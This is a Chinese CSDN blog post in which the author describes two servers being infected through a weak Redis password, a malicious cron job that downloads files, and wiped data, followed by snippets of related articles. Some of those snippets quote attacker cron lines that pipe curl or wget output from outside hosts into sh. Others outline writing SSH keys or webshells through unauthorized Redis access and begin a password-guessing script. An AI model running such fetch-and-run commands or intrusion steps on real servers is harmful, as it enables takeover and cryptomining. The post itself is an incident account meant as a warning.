【经历毒打,非技术文章】被redis弱密码入侵

最新推荐文章于 2024-05-18 14:33:26 发布
最新推荐文章于 2024-05-18 14:33:26 发布
阅读量6k 收藏
点赞数
文章标签: 其他 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42410310/article/details/123490002
版权

昨天和凌晨自己的两台服务器都中毒了,原因是使用我的redis简密码入侵的;

执行了这一串代码,凌晨2点系统告诉我系统被植入病毒了,我修修补补了一下,以为另一台服务器不会被植入的,结果4点多我的集群就中了。哎,要相信直觉

写了一个定时任务叫 dog 

我记得他们的时间是 20 ,30 ,45,55都去执行下载文件的

 

会删除所有redis数据

病毒去下载奇奇怪怪的玩意下来,不过下载完了会自删除,和我另一台服务器中毒执行的不一样,有空在折腾吧,不影响我的操作,打算钓鱼一波的,下次买一台服务器在说吧

一定要配置日志,这样容易追踪,日志记录是个好习惯,吃了没熟练Linux文化的亏

 

 

烟雨路人非,你我皆是路人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Redis集群/空密码问题整改
11-15
Redis集群/空密码问题整改 1.密码整改 使用redis安装用户,在命令行连接上redis集群后,执行命令:config set requirepass 【自定义的强密码】,如: config set requirepass mypassword@#75@~ 然后执行 config rewrite 将配置密码持久化到redis配置文件,redis集群重启密码依然有效。 注:此方式无需重启redis集群服务密码即可生效。 客户端连接配置需要修改为新密码,并将客户端密码进行加密处理,客户端加密方式见第3部分。 2.空密码整改 使用redis安装用户,在命令行连接上redis集群后,执行命令:config set requirepass 【自定义的强密码】,如: config set requirepass mypassword@#75@~ 然后执行 config rewrite 将配置密码持久化到redis配置文件,redis集群重启密码依然有效。 注:此方式无需重启redis集群服务密码即可生效。 配置完密码后,连接redis服务的应用也要做相应的修改,增加密码配置,并
基于redis集群设置密码的实例
09-09
Redis集群中设置密码是非常重要的安全措施,它可以防止未经授权的访问和操作。下面将详细介绍如何在Redis集群中设置密码,并讨论一些相关的注意事项。 首先,我们需要了解Redis的`requirepass`和`masterauth`两个...
redis被黑客入侵
程序员陆通
02-12 1472
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
Python 渗透测试:Redis 数据库 密码测试.(6379端口)
最新发布
网络安全领域___专研者.
05-18 425
Redis (Remote Dictionary Server) 是一个开源的、内存中的数据结构存储系统,它可以用作数据库、缓存和消息中间件。它支持多种类型的数据结构,如字符串(strings)、哈希(hashes)、列表(lists)、集合(sets)、有序集合(sorted sets)等,并且能够对这些数据结构进行高级操作。Redis 数据库爆破是指利用暴力破解的方式尝试获取 Redis 数据库的访问权限。
linux系统redis密码修改,redis未授权口令检测脚本(redis未授权访问漏洞,利用redis写webshell)...
weixin_31916125的博客
05-09 449
以下如有雷同,不胜荣幸*---示例代码!!!!!----*/#!/usr/bin/envpython#_*_coding:utf-8_*_importsocketimportsysPASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']defcheck(ip,...
Linux安装Redis5.0之后设置密码
weixin_41820536的博客
02-25 2042
方法一:通过配置文件(/etc/redis.conf)进行设置 这种方法在设置后需要重启redis生效。首先找到redis的配置文件—redis.conf文件,然后修改里面的requirepass(requirepass 是配置redis访问密码的参数),这个本来是注释起来了的,将注释去掉,并将后面对应的字段设置成自己想要的密码,保存退出。重启redis服务,即可。 方法二:通过命令设置密码 这种方法相对简单,不需要重启redis服务。连接redis之后,通过命令设置,如下:config
阿里云服务器被Redis密码漏洞挖矿
清风思雨的博客
08-11 401
重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis的漏洞半个小时沦陷,长个记性,以后注意!我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。...
Redis 密码设置和查看密码的方法
09-09
主要介绍了Redis 密码设置和查看密码的方法,非常不错,具有参考借鉴价值,需要的朋友可以参考下
解决Redis设置密码重启后失效的问题
12-16
解决方案:在redis的配置文件中直接配置密码 配置文件中有一行是这样的 #requirepass foobared 去掉注释,并且把foobared改为自己的密码 如: requirepass mypwd 2、如果你已经按照上面的方法在配置文件中设置了...
redis 入侵
Henry_Wu001的专栏
07-22 216
redis 入侵
服务器 redis入侵
beyond__devil的博客
09-04 821
这几天服务器上的 redis,出现了一个比较严重的问题: 程序返回错误: MISCONF Redis is configured to save RDB snapshots, but is currently not able to persist on disk. Commands that may modify the data set are disabled. Please ch...
Redis--口令未授权访问漏洞
热门推荐
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
05-19 1万+
Redis中存在未授权访问漏洞,该漏洞源于程序在默认配置下会绑定在6379端口,这导致其直接暴露在公网中,可以接受来自任何地址发来的请求。当程序没有开启认证选项端口对外开放时,攻击者可借助目标服务器访问权限利用该漏洞未授权访问Redis并读取Redis的数据,在服务器上写入公钥,进而使用对应的私钥直接登录目标服务器。
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 851
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,口令或者口令泄露等。
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1252
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt# re...
Redis入侵小结
LIVE
02-26 312
如果远程redis数据库存在未授权访问漏洞,则可以直接上传shell:   开启redis客户端   输入以下命令来连接远程redis   redis-cli -h 125.39.185.150 -p 6379   接下来,在远程redis内存中设置数据:   config set dir /var/www/html(在内存中设置切换的web目录/var/www/html) ...
redis入侵小结
weixin_33953249的博客
09-23 132
redis安装:   windows安装包:http://pan.baidu.com/s/1i3jLlC5   下载下来之后,开始安装:   redis-server.exe redis.conf:     简单一步,安装成功,保持这个windows持续运行~   查看一下我们本机的端口,可以看到多了一个6379端口,安全风险来了,记得设置redis密码~   ...
[安全] Linux系统上因Redis未设置密码而导致的安全问题
陈丁恺的博客
03-22 1345
漏洞概述: 在一定条件下,会出现以下安全问题 1.任何人能够远程访问Redis,读取Redis数据。 2.使用Redis的一些命令,可以向服务器上写入公钥,使用私钥无密码登录服务器,进行远程控制。 漏洞产生的原因: Redis 3.2.x < 3.2.4版本存在缓冲区溢出漏洞,可导致任意代码执行。Redis数据结构存储的CONFIG SET命令中client-output-buf...
Redis 也能被攻击?一次Redis入侵的记录
探索云原生
12-05 5532
通过 RDB 方式入侵Redis 被攻击记录 1. 详情 发现 Redis 中突然多了几个 key backup1 backup2 backup3 backup4 具体内容如下: */2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 *
redis修改密码
05-30
要修改 Redis密码,需要执行以下几个步骤: 1. 进入 Redis 的命令行界面,可以使用以下命令: ``` redis-cli ``` 2. 输入以下命令来设置新密码: ``` config set requirepass NEW_PASSWORD ``` 其中,NEW_PASSWORD 是你要设置的新密码。 3. 退出 Redis 命令行界面,可以使用以下命令: ``` exit ``` 4. 在 Redis 配置文件中,将密码配置为新密码。在 Ubuntu 系统中,Redis 的配置文件位于 /etc/redis/redis.conf。可以使用以下命令打开配置文件: ``` sudo nano /etc/redis/redis.conf ``` 5. 找到以下行: ``` # requirepass foobared ``` 将其修改为: ``` requirepass NEW_PASSWORD ``` 其中,NEW_PASSWORD 是你设置的新密码。 6. 保存并关闭配置文件。 7. 重启 Redis,使新密码生效。可以使用以下命令: ``` sudo systemctl restart redis ``` 现在,你已经成功地修改了 Redis密码。在下一次登录 Redis 命令行界面时,需要使用新密码进行身份验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值